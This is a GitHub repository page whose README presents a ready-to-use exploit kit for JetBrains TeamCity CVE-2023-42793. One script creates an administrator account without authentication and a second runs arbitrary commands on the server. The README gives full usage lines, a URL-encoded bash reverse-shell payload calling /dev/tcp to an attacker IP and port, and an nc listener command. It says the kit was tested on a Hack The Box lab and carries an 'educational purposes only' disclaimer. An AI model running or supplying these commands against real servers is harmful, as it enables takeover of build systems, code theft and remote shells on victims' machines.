Skip to content
/ CVE-2023-42793 Public

JetBrains TeamCity 2023.05.3 - Remote Code Execution (RCE), CVE-2023-42793

www.linkedin.com/in/zyad-abdelbary/
5 stars 1 fork Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

Zyad-Elsayed/CVE-2023-42793

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

17 Commits
README.md
README.md
 
 
exploit.py
exploit.py
 
 
rce.py
rce.py
 
 
requirements.txt
requirements.txt
 
 

Repository files navigation

CVE-2023-42793 - TeamCity Admin Account Creation lead to RCE

use exploit.py first to creat administrator account for you and then use rce.py to execute commands on the target, and for reverse shell check this

exploit script

Description

This script exploits CVE-2023-42793 to create an admin account on a TeamCity server. It sends a POST request to the target URL to create an admin user with specified or random credentials.

Usage

python exploit.py -u <URL> [-v] [-n <USERNAME>] [-p <PASSWORD>] [-e <EMAIL>]

Options

  • -u, --url URL: Target URL (required)
  • -v, --verbose: Enable verbose mode
  • -n, --username USERNAME: Specify username (default: random)
  • -p, --password PASSWORD: Specify password (default: random)
  • -e, --email EMAIL: Specify email (default: random)
  • -t, --token-file: File to save the token

Prerequisites

  • Python 3.x
  • Python libraries
    • To install the dependencies pip3 install -r requirements.txt

Examples

  1. Exploit with random username, password, and email:

    python exploit.py -u http://target.com

  2. Exploit with specified username, password, and email:

    python exploit.py -u http://target.com -n admin -p admin123 -e [email protected]

Output

Upon successful exploitation, the script prints the URL, username, and password of the created admin account then save the output in token file.

Remote Code Execution (RCE) Script

Description This script allows executing commands on a vulnerable TeamCity server exploiting CVE-2023-42793. It first enables the debug processes and then executes the specified command using the appropriate API endpoints.

Usage

python rce_exploit.py -u <URL> [-v] [-c <COMMAND>] [-P <PORT>]

Options

  • -u, --url URL : Target URL (required)
  • -t, --token-file : TO specify the file containing the token
  • -c, --command COMMAND: Specify command to execute (RCE)
  • -P, --port PORT: Specify port (default is 80)

Example

Exploit with a specified command:

python rce.py -u http://target.com -t token -c "whoami"

For reverse shell

python3 rce.py -u http://target.com -t token -c '"/bin/bash"&params="-c"&params="sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{IP}%2F{port}%200%3E%261"'
  • In this command for reverse shell replace {IP} with your ip and {port} with the port you are listening on
  • Creat a listener using nc for ex nc -nvlp 5555
  • For more check revshells

Notes

  • This script has been tested on Runner.htb from hack the box
  • This script is for educational purposes only.
  • Use it responsibly and only on systems you are authorized to test.

Credits

Resources

About

JetBrains TeamCity 2023.05.3 - Remote Code Execution (RCE), CVE-2023-42793

www.linkedin.com/in/zyad-abdelbary/

Topics

shell exploit jetbrains runner poc rce teamcity htb cve-2023-42793

Resources

Readme
Activity

Stars

5 stars

Watchers

2 watching

Forks

1 fork
Report repository

Languages